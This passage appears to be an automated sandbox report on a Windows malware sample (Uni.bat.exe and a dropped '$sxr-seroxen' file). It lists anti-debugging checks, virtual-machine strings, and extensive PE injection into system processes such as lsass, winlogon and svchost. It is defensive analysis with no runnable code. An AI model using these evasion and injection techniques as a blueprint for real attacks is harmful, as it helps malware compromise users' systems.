RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose
Source: lsass.exe, 0000000E.00000000.3269123828.000002AFF4CA8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000016.00000000.3887735156.0000027F7EC8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *@Microsoft-Windows-Hyper-V-Hypervisor-Operational
Source: svchost.exe, 00000016.00000000.3885468985.0000027F7EC43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-VID
Source: Uni.bat.exe, 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: svchost.exe, 00000016.00000000.3885468985.0000027F7EC43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: F014, 0&@Microsoft-Windows-Hyper-V-VID-Analytic)
Source: svchost.exe, 00000016.00000000.3885468985.0000027F7EC43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: : 49cd8.@Microsoft-Windows-Hyper-V-VID-Admin [(0
Source: svchost.exe, 00000016.00000000.3885468985.0000027F7EC43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 6.@Microsoft-Windows-Hyper-V-ComputeLiblS
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *@Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@Microsoft-Windows-Hyper-V-Compute-Operational
Source: svchost.exe, 00000016.00000000.3885468985.0000027F7EC43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@Microsoft-Windows-Hyper-V-Hypervisor-Adminys1
Source: svchost.exe, 00000020.00000000.4222606848.0000021E7C000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 0000000E.00000000.3269123828.000002AFF4CA8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000016.00000000.3940274327.0000027F7ECAD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: .@Microsoft-Windows-Hyper-V-Guest-Drivers/Debug
Source: svchost.exe, 00000016.00000000.3885468985.0000027F7EC43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ble{A47.@Microsoft-Windows-Hyper-V-Hypervisor-Analytic
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *@Microsoft-Windows-Hyper-V-Guest-Drivers/Operational
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: "@Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: .@Microsoft-Windows-Hyper-V-Compute-Analytic
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *@Microsoft-Windows-Hyper-V-Guest-Drivers-IcSvc
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400FC030 IsDebuggerPresent, 5_2_00000001400FC030
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140069E5E OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,GetFileType,WriteConsoleW,GetLastError,WriteFile,WriteFile,OutputDebugStringW, 5_2_0000000140069E5E
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140077510 VirtualQuery,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree, 5_2_0000000140077510
Enables debug privileges
Source: C:\Users\user\Desktop\Uni.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Uni.bat.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140069DCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_0000000140069DCD
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140075470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0000000140075470
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400698FF IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00000001400698FF
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140068EB9 SetUnhandledExceptionFilter, 5_2_0000000140068EB9
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_0000000140069DCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0000000140069DCD
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_0000000140075470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_0000000140075470
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400698FF IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00000001400698FF
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_0000000140068EB9 SetUnhandledExceptionFilter, 11_2_0000000140068EB9

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140067000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 14013F000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140174000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140178000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140183000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140185000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140186000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140187000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140188000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140189000 Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 42EEBBF010 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140067000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 14013F000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140174000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140178000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140183000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140185000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140186000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140187000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140188000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140189000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 51B661F010 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140067000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 14013F000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140174000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140178000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140183000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140185000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140186000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140187000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140188000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 1402F4000 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 2EB3F77010 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 23565AF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2AFF5E00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20F6F6E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 252B9030000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E5452D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1488E0A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21FDA940000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 225E8C10000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 12E242C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27F00020000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14BEA2D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FA6640000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 14825330000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 252DE2F0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E839600000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22B49E00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D7CBB40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21668C20000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ED3F40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21E7CD40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192F8540000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D7A9E00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 10598CC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C679000000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C552C80000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ED1CE50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F89E200000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC9CF40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21533940000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1DF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D27C140000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ADB540000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 212B5400000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15E59F00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2833AF40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E6C0A10000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21FFB800000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28AE3C00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 1F5C6F20000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1D9EE7C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21F0A0C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2473AB40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14A0AB70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 29682AC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2E754540000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 24B3FC50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1B4940000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: 1AD20000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D38B280000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20DCAD40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C7270A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1AB63E30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: BD40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 231D83A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22458E80000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A3BEA00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1AC57890000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F6E1C00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 211FA3B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 209E5400000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26D44CC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 268A8000000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AC74400000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26E2E800000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21D83630000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1A12D0F0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18B98810000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 690000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28F97E00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20A6C460000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2B3DCC40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22BE8590000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 27E2A410000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9E2850000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21296A00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 225D52E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CCA5EA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 12F47070000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17150A90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22000530000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 254E6340000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 243B3C90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20101B80000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\$sxr-seroxen.bat.exe base: 1B3BCDE0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 21470D50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 28D1E3E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 28D1F030000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2477ED00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2F09E280000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D477F40000 Jump to behavior
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1488DDA0000
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Uni.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 23565AF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2AFF5E00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20F6F6E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 252B9030000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E5452D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1488E0A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21FDA940000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe base: 225E8C10000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 12E242C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27F00020000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14BEA2D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FA6640000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe base: 14825330000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe base: 252DE2F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E839600000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22B49E00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D7CBB40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21668C20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ED3F40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21E7CD40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192F8540000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D7A9E00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 10598CC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C679000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C552C80000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ED1CE50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F89E200000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC9CF40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21533940000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1DF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D27C140000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 14ADB540000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 212B5400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15E59F00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2833AF40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E6C0A10000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21FFB800000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28AE3C00000 value starts with: 4D5A Jump to behavior
